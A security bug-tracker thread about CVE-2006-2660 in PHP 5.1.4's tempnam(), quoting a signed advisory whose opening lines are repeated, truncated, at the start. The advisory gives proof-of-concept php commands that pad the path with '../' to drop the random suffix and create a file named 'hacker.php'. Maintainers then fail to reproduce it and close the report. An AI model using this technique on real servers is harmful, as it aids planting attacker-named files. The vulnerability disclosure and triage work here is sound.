The CVE is under review, but it appears to be legitimate. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [tempnam() Bypass unique file name PHP 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 22.5.2006 - -Public: 11.6.2006 from SECURITYREASON.COM CVE-2006-2660 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S
The CVE is under review, but it appears to be legitimate. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [tempnam() Bypass unique file name PHP 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 22.5.2006 - -Public: 11.6.2006 from SECURITYREASON.COM CVE-2006-2660 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. tempnam -- Create file with unique file name. - --- 1. tempnam() Bypass unique file name --- In lastes adv i have public an issue "Open Basedir Bypass". In function tempname() are required 2 arg`s. http://pl.php.net/manual/en/function.tempnam.php string tempnam ( string dir, string prefix ) In PHP 5.1.4 exists bug that allows you to create file with any name. - --- cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";' /www/temp/hacker.phpGQMqSE - --- You have created file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically added to filename. Problem exists, because path couldn't be longer than MAXPATHLEN. In standard MAXPATHLEN is 1024B. - -771-805--- PHP_FUNCTION(tempnam) { zval **arg1, **arg2; char *d; char *opened_path; char *p; int fd; size_t p_len; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(arg1); convert_to_string_ex(arg2); if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1)); php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC); if (p_len > 64) { p[63] = '\0'; } if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) { close(fd); RETVAL_STRING(opened_path, 0); } else { RETVAL_FALSE; } efree(p); efree(d); } - -771-805--- So if you create path like /www/../www/.. etc. arg1+arg2=1023 uniqueid is not given to path. Example: - --- cxib# php -r 'echo tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../ www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";' /www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../ www/../www/../www/temp/hacker.php - --- = /www/temp/hacker.php - --- cxib# ls -la /www/temp/hacker* - -rw------- 1 cxib cxib 0 May 22 23:33 /www/temp/hacker.php - -rw------- 1 cxib cxib 0 May 22 23:26 /www/temp/hacker.phpGQMqSE - --- - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, l3x, pi3, eax, Infospec ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFEjGMW3Ke13X/fTO4RAl50AKCH7H7pDtfjTLcZ02+izd3P25fkvACfS7tK tTnC41pJ3aQEAEvt580AqI0= =ZfrH -----END PGP SIGNATURE-----
Tried the PoC on php-4.4.2-pl2, and it does not appear to work there, at least. I do not have access to 5.1.4 at the moment.
Tried the PoC on a freshly installed 5.1.4. The cut-off point appears to be 4096, not 1024 (for me anyway). As soon as the path goes over 4095 bytes, the temp file gets changed to '/tmp/<filename><random>'. So, I'm not sure under what conditions this is supposed to work. I'll let someone else with more authority switch to INVALID, if that is the case, however.
stepp: Isnt' that the point? Bloat the filename and get a file handle you can control?
No, perhaps I was unclear. The filename is still not controllable. For example: tempnam("/www/..< pad to 4095 total >/www/temp/","hacker123.php"); results in /www/temp/hacker123.php3I2fgH or something similar tempnam("/www/..< pad to 4096 total >/www/temp/","hacker1234.php"); results in /tmp/hacker1234.php3I2fgH or something similar. The random string at the end is still there.
Add PHP Team to CC. Best regards, CHTEKK.
stepp: I must be stupid here, but that's how tempnam() is supposed to work. Isn't the whole idea of the exploit to pad the directory with bloat until you reach MAXPATHLEN-strlen(wantedfile), which would give you a controllable file handle? At least that's what I see the exploit claims to do.
Ah, I got confused, obviously. So on your system the functions falls back like in the case when the directory doesn't exist? I'll try to confirm this here.
I just tried with 5.1.4 (x86) from portage and get the same result as Nigel does (the function falls back to /tmp, and the random tail is still intact), so I'd count it as INVALID.
i had already checked this issue before, i had chosen to not fill a bug. I would close it as "invalid" too.
What do we do here? Close or not? I can't reproduce it too here on all my systems, so closing it invalid seems right. Best regards, CHTEKK.
I could neither and so I'd also suggest invalidating this one, unless anybody steps up to say it worked for him/her.
Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4. Upstream provided an explicit patch for this (so they were able to reproduce it somehow), and it was added to those releases. Stabling of those two PHP versions can be handled in bug 133524. Best regards, CHTEKK.
Seems like it is time for GLSA decision on this one as well.
invalid, IMHO, not reproducable on x86 at least. Other arches? Else I vote "no".
Voting no, this bug is stupid. You don't give control to the untrusted party to the path in tempnam, doesn't work, and impact is lame.
yet another "no" and closing...
